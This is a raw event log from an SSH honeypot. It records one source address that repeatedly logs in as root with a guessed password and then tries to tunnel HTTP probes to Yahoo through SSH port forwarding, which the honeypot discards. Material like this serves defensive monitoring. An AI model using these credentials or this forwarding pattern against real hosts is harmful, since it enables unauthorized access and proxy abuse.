{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":21837,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:21837","sensor":"my-vps","timestamp":"2025-08-26T00:56:59.073361Z","session":"2b1cda24271b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:59.120381Z","src_ip":"213.209.150.239","session":"2b1cda24271b"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:59.168063Z","src_ip":"213.209.150.239","session":"2b1cda24271b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":58479,"dst_ip":"1.2.3.4","dst_port":22,"session":"4cd72ed28e49","protocol":"ssh","message":"New connection: 213.209.150.239:58479 (1.2.3.4:22) [session: 4cd72ed28e49]","sensor":"my-vps","timestamp":"2025-08-26T00:56:59.214297Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:59.215164Z","src_ip":"213.209.150.239","session":"4cd72ed28e49"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:59.261934Z","src_ip":"213.209.150.239","session":"4cd72ed28e49"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:59.495774Z","src_ip":"213.209.150.239","session":"4cd72ed28e49"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":8568,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:8568","sensor":"my-vps","timestamp":"2025-08-26T00:56:59.543567Z","session":"4cd72ed28e49"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:59.590811Z","src_ip":"213.209.150.239","session":"4cd72ed28e49"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":6004,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:6004","sensor":"my-vps","timestamp":"2025-08-26T00:56:59.725385Z","session":"4cd72ed28e49"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:59.772399Z","src_ip":"213.209.150.239","session":"4cd72ed28e49"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:59.820083Z","src_ip":"213.209.150.239","session":"4cd72ed28e49"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":58517,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f95adea0f03","protocol":"ssh","message":"New connection: 213.209.150.239:58517 (1.2.3.4:22) [session: 7f95adea0f03]","sensor":"my-vps","timestamp":"2025-08-26T00:56:59.866616Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:59.876899Z","src_ip":"213.209.150.239","session":"7f95adea0f03"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:59.915113Z","src_ip":"213.209.150.239","session":"7f95adea0f03"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:00.150058Z","src_ip":"213.209.150.239","session":"7f95adea0f03"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":27150,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:27150","sensor":"my-vps","timestamp":"2025-08-26T00:57:00.198200Z","session":"7f95adea0f03"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:00.245505Z","src_ip":"213.209.150.239","session":"7f95adea0f03"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":2180,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:2180","sensor":"my-vps","timestamp":"2025-08-26T00:57:00.381655Z","session":"7f95adea0f03"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:00.428877Z","src_ip":"213.209.150.239","session":"7f95adea0f03"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:00.477421Z","src_ip":"213.209.150.239","session":"7f95adea0f03"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":58561,"dst_ip":"1.2.3.4","dst_port":22,"session":"a84d38dea069","protocol":"ssh","message":"New connection: 213.209.150.239:58561 (1.2.3.4:22) [session: a84d38dea069]","sensor":"my-vps","timestamp":"2025-08-26T00:57:00.523541Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:00.533609Z","src_ip":"213.209.150.239","session":"a84d38dea069"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:00.570912Z","src_ip":"213.209.150.239","session":"a84d38dea069"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:00.853672Z","src_ip":"213.209.150.239","session":"a84d38dea069"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":21188,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:21188","sensor":"my-vps","timestamp":"2025-08-26T00:57:00.901942Z","session":"a84d38dea069"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:00.949679Z","src_ip":"213.209.150.239","session":"a84d38dea069"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":29822,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:29822","sensor":"my-vps","timestamp":"2025-08-26T00:57:01.085577Z","session":"a84d38dea069"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:01.133096Z","src_ip":"213.209.150.239","session":"a84d38dea069"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:01.181145Z","src_ip":"213.209.150.239","session":"a84d38dea069"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":58605,"dst_ip":"1.2.3.4","dst_port":22,"session":"0afcc5c3dc29","protocol":"ssh","message":"New connection: 213.209.150.239:58605 (1.2.3.4:22) [session: 0afcc5c3dc29]","sensor":"my-vps","timestamp":"2025-08-26T00:57:01.227309Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:01.236304Z","src_ip":"213.209.150.239","session":"0afcc5c3dc29"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:01.274809Z","src_ip":"213.209.150.239","session":"0afcc5c3dc29"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:01.510454Z","src_ip":"213.209.150.239","session":"0afcc5c3dc29"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":17884,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:17884","sensor":"my-vps","timestamp":"2025-08-26T00:57:01.560045Z","session":"0afcc5c3dc29"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:01.607783Z","src_ip":"213.209.150.239","session":"0afcc5c3dc29"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":18139,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:18139","sensor":"my-vps","timestamp":"2025-08-26T00:57:01.753824Z","session":"0afcc5c3dc29"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:01.801484Z","src_ip":"213.209.150.239","session":"0afcc5c3dc29"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:01.849804Z","src_ip":"213.209.150.239","session":"0afcc5c3dc29"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":58660,"dst_ip":"1.2.3.4","dst_port":22,"session":"c2f0e63c000d","protocol":"ssh","message":"New connection: 213.209.150.239:58660 (1.2.3.4:22) [session: c2f0e63c000d]","sensor":"my-vps","timestamp":"2025-08-26T00:57:01.895890Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:01.896540Z","src_ip":"213.209.150.239","session":"c2f0e63c000d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:01.944223Z","src_ip":"213.209.150.239","session":"c2f0e63c000d"}
{"eventid":"cowrie.session.closed","duration":"301.2","message":"Connection lost after 301.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:01.981551Z","src_ip":"212.227.235.229","session":"449994fceb8f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:02.180508Z","src_ip":"213.209.150.239","session":"c2f0e63c000d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":12958,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:12958","sensor":"my-vps","timestamp":"2025-08-26T00:57:02.228668Z","session":"c2f0e63c000d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:02.276222Z","src_ip":"213.209.150.239","session":"c2f0e63c000d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":21045,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:21045","sensor":"my-vps","timestamp":"2025-08-26T00:57:02.413678Z","session":"c2f0e63c000d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:02.460959Z","src_ip":"213.209.150.239","session":"c2f0e63c000d"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:02.509027Z","src_ip":"213.209.150.239","session":"c2f0e63c000d"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":58709,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c8473bf2e62","protocol":"ssh","message":"New connection: 213.209.150.239:58709 (1.2.3.4:22) [session: 9c8473bf2e62]","sensor":"my-vps","timestamp":"2025-08-26T00:57:02.564726Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:02.565561Z","src_ip":"213.209.150.239","session":"9c8473bf2e62"}
